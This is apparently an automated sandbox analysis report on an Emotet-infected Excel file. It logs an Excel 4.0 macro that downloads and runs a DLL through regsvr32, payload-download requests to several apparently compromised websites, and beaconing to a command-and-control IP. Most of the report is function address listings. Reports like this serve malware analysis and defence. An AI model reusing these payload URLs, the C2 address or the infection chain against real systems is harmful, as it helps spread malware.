                      Source: regsvr32.exe, 00000009.00000002.1210700367.00000000003E7000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151735990.00000000003E5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151526148.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1210653343.00000000002FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://218.38.121.17/
                      Source: regsvr32.exe, 00000009.00000002.1210992650.0000000002FC0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1210653343.00000000002FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.co
                      Source: regsvr32.exe, 00000009.00000002.1210719728.00000000003F5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151539423.00000000003ED000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151610020.00000000003F1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1210653343.00000000002FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\40hd04O0[1].dllJump to behavior
                      Source: unknownDNS traffic detected: queries for: sat7ate.com
                      Source: global trafficHTTP traffic detected: GET /Adapter/moycMR/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.spinbalence.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /index.php?controller=404 HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.spinbalence.comConnection: Keep-AliveCookie: PrestaShop-7318ab2db5e4a3c3a59fb8879ad22162=Nw04PzmYYXL6IgJsn1ERim4S4YpS6Ls6dHZki%2FijBePykYJIX2P7PO%2Fz2gyuaY7ukuFjkghLJ9VD2B347P4foDXH3WhaK5EtQkBaO4YrzSE%3D000075
                      Source: global trafficHTTP traffic detected: GET /Content/Afa1PcRuxh/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.3d-stickers.comConnection: Keep-AliveCookie: PrestaShop-a30a9934ef476d11b6cc3c983616e364=9ybostxWPod7nP43PifVMXkPdOrv4EO5U%2FKqPmWtgSFI2Ckr%2B1t%2BqGSwMBMouqmkFK0SD2XdZ7Cg5qtQQ9RwtkOJ6mVwbNsm9NO1rvVxNh8%3D000079
                      Source: global trafficHTTP traffic detected: GET /page-non-trouvee HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.3d-stickers.comConnection: Keep-AliveCookie: PrestaShop-a30a9934ef476d11b6cc3c983616e364=9ybostxWPod7nP43PifVMXkPdOrv4EO5U%2FKqPmWtgSFolWp%2F7SQd8f90S8O%2FCwGohxkvf3iPluWhTbyznpM1hokG52ER60fuMOhd0m7WY6E%3D000075
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: QIerciqTmKVMTalY=ZNu1qVV4648TLcWc9PPurZOk8Euzv2esBBYSgK+0qI7gqkg7BYL3F0mCxQgzQRyD5wFY7LKdM3+m6rzAWA7DM0zlGdOu9mA+uitu6Au4yztsyCFHh5OpKU22gqXtPhtVuPee01EQS+Zfbc11xfPG5H+RbXgi6TGtiNnVWQj9vku1x5cT4DQp5DbsaxbTUVxBqIRQ6Zp9JoWXziesjQBhwb098hRQoA==Host: 218.38.121.17
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: SoHpbOHll=S1ZaEV/2K+G2MuFR5aWJIrFZWKJ6BUgx2VARY+iQICyCR3IjoBJq+ugHbhYuoa/1EyVyNWv+NFsl7eeESQnqDpazHNIhxXrZoY/Vuf2vmUqGl6dUPaa4tJ0lwsWfZmrxJ7pEDSggisnX+azuZvVEIAxjw6MoQMrIX6LHhpMhUlw6eJmGasOFasTPM8tRLJgpALsu1FrL12a9RO9cEVaRDYWnxpnpdi1nRvXITNoIrml15gO1b66MMFvst35GgkHSH4wY0dfE/LeROelUM6svgfP9p8M/xbXjvu2jNncQnCwlRNDoB1qZ0If0i6ltN2YsK7d/Host: 218.38.121.17
                      Source: global trafficHTTP traffic detected: GET /Adapter/moycMR/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.spinbalence.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /Content/Afa1PcRuxh/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.3d-stickers.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /bsavxiv/axHQYKl/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: navylin.comConnection: Keep-Alive
                      Source: unknownHTTPS traffic detected: 163.172.115.127:443 -> 192.168.2.22:49172 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 163.172.108.69:443 -> 192.168.2.22:49175 version: TLS 1.2
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_10025238 GetParent,ScreenToClient,GetKeyState,GetKeyState,GetKeyState,KillTimer,IsWindow,
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_10014B20 GetKeyState,GetKeyState,GetKeyState,SendMessageA,
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_10025C50 GetKeyState,GetKeyState,GetKeyState,GetParent,GetParent,SendMessageA,ScreenToClient,GetCursorPos,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SetWindowPos,SendMessageA,SendMessageA,GetParent,

                      E-Banking Fraud

                      barindex
                      Yara detected Emotet
                      Source: Yara matchFile source: 00000009.00000002.1210607529.000000000039A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.1210571701.00000000002BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 8.2.regsvr32.exe.2010000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.regsvr32.exe.2010000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.regsvr32.exe.1d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.regsvr32.exe.2b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.regsvr32.exe.2b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.regsvr32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000A.00000002.1211898571.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.1210482177.00000000001D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.1211244100.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.940135302.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.939239138.0000000002010000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.1210480334.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

                      System Summary

                      barindex
                      Found malicious Excel 4.0 Macro
                      Source: 4470_02112022.xlsMacro extractor: Sheet: Sheet6 contains: URLDownloadToFileA
                      Source: 4470_02112022.xlsMacro extractor: Sheet: Sheet6 contains: URLDownloadToFileA
                      Office process drops PE file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\oxnv4.ooccxxJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\40hd04O0[1].dllJump to dropped file
                      Found Excel 4.0 Macro with suspicious formulas
                      Source: 4470_02112022.xlsInitial sample: EXEC
                      Source: 4470_02112022.xlsInitial sample: EXEC
                      Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\system32\SnILCOTnpOOFucYhP\Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_100073A4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_1003B0D0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_1004E0F0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_10044160
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_100491A0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_10048210
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_100102D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_1004B340
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_1001C3CC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_1003E540
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_1003B5D0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_1003F650
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_10031730
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_10044730
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_100547A0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_1003D830
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_10034910
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_1002C9A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_100449B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_1004E9C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_10048A10
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_10031A60
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_10018A70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_1003CC40
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_10025C50
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_10027C6C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_10037CB0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_10043CC0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_10001CC8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_10021CD0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_10013CFC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_10016D48
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_10054D70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_1003DD80
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_10034DC0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_1000FDC8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_10038DF0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_10033EB0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_1004EED0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_10040FB0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_1004BFF0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_001C0000
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00000001800018F0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180009AC0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180003B78
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00000001800143B4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018002AC7C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000DC7C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00000001800184BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018001A788
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00000001800247AC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018001D7F8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000C800
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018002B814
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180017824
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180003824
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018002803C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180023840
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018001B058
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000D87C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00000001800098AC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00000001800168B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00000001800078B4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00000001800190BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018002B0C4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00000001800040EC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00000001800288F8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180021918
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180004918
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000C930
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180025938
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000F138
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000E93C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018001D150
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180022158
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180015958
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018001A170
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180003970
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018001298D
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180011194
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180029198
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000A198
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00000001800031C4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000C1E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000421C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180023228
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018001CA34
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018001DA34
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018001EA38
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018002B23C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018002A244
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000D250
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180027A68
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180002A6C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180014274
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180012288
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180012AA6
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00000001800122C8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00000001800072CC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180006ADC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00000001800012F0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000FB04
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018001E30C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018001531C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000A31C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180004B50
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180029360
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180017B68
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018002539C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00000001800033A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00000001800233B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00000001800243B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180006BBC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018001FBD8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00000001800043F4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000C3F4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018001DC00
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018001EC08
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180007418
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180025C1C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000A42C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000E42C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180028C38
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180019C4C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000145C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180002480
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180020490
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00000001800164B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180017CC0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180026CD0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000BCD8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00000001800114E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00000001800154EC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018001FD00
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018002A518
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180020D20
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018001A524
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000D52C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180010D54
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180002D54
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018002B55C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180004D70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180024D84
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018002358C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180029590
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180021594
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018001D5B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180027DB8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018001B5C4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018001FDF4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000F60C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018001E61C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180007620
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000BE20
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018001DE2C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180023E4C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180001650
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018002765C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000EE5C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180015E70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180017E74
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000FE84
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00000001800056BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018002B6C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018001C6CC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180020ED4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00000001800116DC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00000001800166E8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00000001800036FC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000D704
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180015714
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000E720
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180024F30
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180001744
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180018764
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180028768
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180010F74
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180018F80
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018002A784
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180016F84
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00000001800027B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180026FBC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180012FC8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018001FFD8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00000001800117E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_002F0000
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180025C1C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180019C4C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180006251
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180015E70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000DC7C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180008688
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800078B4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800018F0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800132FC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180009D2C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180022334
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180002D54
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180003B78
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018001A788
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000599B
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018001D5B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800143B4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018001FDF4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800043F4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000C3F4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018001D7F8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018001DC00
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000C800
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018001EC08
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000F60C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018002B814
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180007418
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018001E61C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000421C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180007620
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000BE20
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180017824
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180003824
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180023228
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180010628
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018001DE2C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000A42C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000E42C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018001CA34
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018001DA34
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180028C38
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018001EA38
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018002803C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018002B23C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180011C3C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180023840
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018002A244
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180027448
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180023E4C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180001650
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000D250
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018001B058
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018002765C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000145C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000EE5C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180013A60
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180027A68
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180002A6C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018002AA74
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180014274
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180017E74
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018002AC7C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000D87C
